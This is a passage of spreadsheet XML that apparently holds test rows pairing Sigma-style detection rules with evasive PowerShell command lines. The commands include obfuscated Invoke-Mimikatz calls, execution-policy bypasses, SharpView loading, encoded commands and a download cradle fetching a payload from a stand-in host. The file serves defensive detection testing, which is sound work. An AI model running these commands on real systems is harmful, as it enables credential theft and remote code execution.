          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F189" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G189" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H189" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I189" s="36" t="n"/>
      <c r="J189" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K189" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="190" ht="15.75" customHeight="1" s="42">
      <c r="A190" s="43" t="n"/>
      <c r="B190" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C190" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D190" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E190" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F190" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G190" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H190" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I190" s="36" t="n"/>
      <c r="J190" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K190" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="191" ht="15.75" customHeight="1" s="42">
      <c r="A191" s="43" t="n"/>
      <c r="B191" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C191" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D191" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E191" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F191" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G191" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H191" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I191" s="43" t="n"/>
      <c r="J191" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K191" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="192" ht="15.75" customHeight="1" s="42">
      <c r="A192" s="43" t="n"/>
      <c r="B192" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C192" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D192" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E192" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F192" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G192" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H192" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I192" s="36" t="n"/>
      <c r="J192" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K192" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="193" ht="15.75" customHeight="1" s="42">
      <c r="A193" s="43" t="n"/>
      <c r="B193" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C193" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D193" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E193" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F193" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G193" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H193" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I193" s="43" t="n"/>
      <c r="J193" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K193" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="194" ht="15.75" customHeight="1" s="42">
      <c r="A194" s="43" t="n"/>
      <c r="B194" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C194" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D194" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E194" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F194" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G194" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H194" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I194" s="43" t="n"/>
      <c r="J194" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K194" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="195" ht="15.75" customHeight="1" s="42">
      <c r="A195" s="43" t="n"/>
      <c r="B195" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C195" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D195" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E195" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F195" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G195" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H195" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I195" s="43" t="n"/>
      <c r="J195" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K195" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="196" ht="15.75" customHeight="1" s="42">
      <c r="A196" s="43" t="n"/>
      <c r="B196" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C196" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D196" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E196" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F196" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G196" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H196" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I196" s="36" t="n"/>
      <c r="J196" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K196" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="197" ht="15.75" customHeight="1" s="42">
      <c r="A197" s="43" t="n"/>
      <c r="B197" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C197" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D197" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E197" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" /"ExecutionPolicy" Bypass -cOmmAND "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F197" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G197" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H197" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I197" s="36" t="n"/>
      <c r="J197" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K197" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="198" ht="15.75" customHeight="1" s="42">
      <c r="A198" s="43" t="n"/>
      <c r="B198" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C198" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D198" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E198" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"ExecutionPolicy" Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F198" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G198" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H198" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I198" s="43" t="n"/>
      <c r="J198" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K198" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="199" ht="15.75" customHeight="1" s="42">
      <c r="A199" s="43" t="n"/>
      <c r="B199" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C199" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D199" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E199" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -ExeCUTIONPOLICY Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F199" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G199" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H199" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I199" s="43" t="n"/>
      <c r="J199" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K199" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="200" ht="15.75" customHeight="1" s="42">
      <c r="A200" s="43" t="n"/>
      <c r="B200" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C200" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D200" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E200" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -EXeCutIONPOlIcY Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F200" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G200" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H200" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I200" s="36" t="n"/>
      <c r="J200" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K200" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="201" ht="15.75" customHeight="1" s="42">
      <c r="A201" s="43" t="n"/>
      <c r="B201" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C201" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D201" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E201" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noPrOFilE -"ExecutionPolicy" Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F201" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G201" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H201" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I201" s="43" t="n"/>
      <c r="J201" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K201" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="202" ht="15.75" customHeight="1" s="42">
      <c r="A202" s="43" t="n"/>
      <c r="B202" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C202" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D202" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E202" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROfILe -ep Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F202" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G202" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H202" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I202" s="43" t="n"/>
      <c r="J202" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K202" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="203" ht="15.75" customHeight="1" s="42">
      <c r="A203" s="43" t="n"/>
      <c r="B203" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C203" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D203" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E203" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"ExecutionPolicy" Bypass -COmMaNd "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F203" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G203" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H203" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I203" s="43" t="n"/>
      <c r="J203" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K203" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="204" ht="15.75" customHeight="1" s="42">
      <c r="A204" s="43" t="n"/>
      <c r="B204" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C204" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D204" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E204" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -eXecUTIoNpolicY Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F204" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G204" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H204" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I204" s="43" t="n"/>
      <c r="J204" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K204" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="205" ht="15.75" customHeight="1" s="42">
      <c r="A205" s="43" t="n"/>
      <c r="B205" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C205" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D205" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E205" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F205" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G205" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H205" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I205" s="43" t="n"/>
      <c r="J205" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K205" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="206" ht="15.75" customHeight="1" s="42">
      <c r="A206" s="43" t="n"/>
      <c r="B206" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C206" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D206" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E206" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F206" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G206" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H206" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I206" s="43" t="n"/>
      <c r="J206" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K206" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="207" ht="15.75" customHeight="1" s="42">
      <c r="A207" s="43" t="n"/>
      <c r="B207" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C207" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D207" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E207" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F207" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G207" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H207" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I207" s="36" t="n"/>
      <c r="J207" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K207" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="208" ht="15.75" customHeight="1" s="42">
      <c r="A208" s="43" t="n"/>
      <c r="B208" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C208" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D208" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E208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208" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G208" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H208" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I208" s="36" t="n"/>
      <c r="J208" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K208" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="209" ht="15.75" customHeight="1" s="42">
      <c r="A209" s="43" t="n"/>
      <c r="B209" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C209" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D209" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E209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209" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G209" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H209" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I209" s="36" t="n"/>
      <c r="J209" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K209" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="210" ht="15.75" customHeight="1" s="42">
      <c r="A210" s="43" t="n"/>
      <c r="B210" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C210" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D210" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E210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210" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G210" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H210" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I210" s="43" t="n"/>
      <c r="J210" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K210" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="211" ht="15.75" customHeight="1" s="42">
      <c r="A211" s="43" t="n"/>
      <c r="B211" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C211" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D211" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E211" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noproFiLE /"NonInteractive" -ep Bypass -CoMmaND "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F211" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G211" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H211" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I211" s="36" t="n"/>
      <c r="J211" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K211" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="212" ht="15.75" customHeight="1" s="42">
      <c r="A212" s="43" t="n"/>
      <c r="B212" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C212" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D212" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E212" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F212" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G212" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H212" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I212" s="36" t="n"/>
      <c r="J212" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K212" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="213" ht="15.75" customHeight="1" s="42">
      <c r="A213" s="43" t="n"/>
      <c r="B213" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C213" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D213" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E213" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F213" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G213" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H213" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I213" s="36" t="n"/>
      <c r="J213" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K213" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="214" ht="15.75" customHeight="1" s="42">
      <c r="A214" s="43" t="n"/>
      <c r="B214" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C214" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D214" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E214" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodEDCOMManD JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F214" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G214" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H214" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I214" s="36" t="n"/>
      <c r="J214" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K214" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="215" ht="15.75" customHeight="1" s="42">
      <c r="A215" s="43" t="n"/>
      <c r="B215" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C215" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D215" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E215" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F215" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G215" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H215" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I215" s="43" t="n"/>
      <c r="J215" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K215" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="216" ht="15.75" customHeight="1" s="42">
      <c r="A216" s="43" t="n"/>
      <c r="B216" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C216" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D216" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E216" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F216" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G216" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H216" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I216" s="43" t="n"/>
      <c r="J216" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K216" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="217" ht="15.75" customHeight="1" s="42">
      <c r="A217" s="43" t="n"/>
      <c r="B217" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C217" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D217" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E217" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F217" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G217" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H217" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I217" s="43" t="n"/>
      <c r="J217" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K217" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="218" ht="15.75" customHeight="1" s="42">
      <c r="A218" s="43" t="n"/>
      <c r="B218" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C218" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D218" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E218" s="36" t="inlineStr">
        <is>
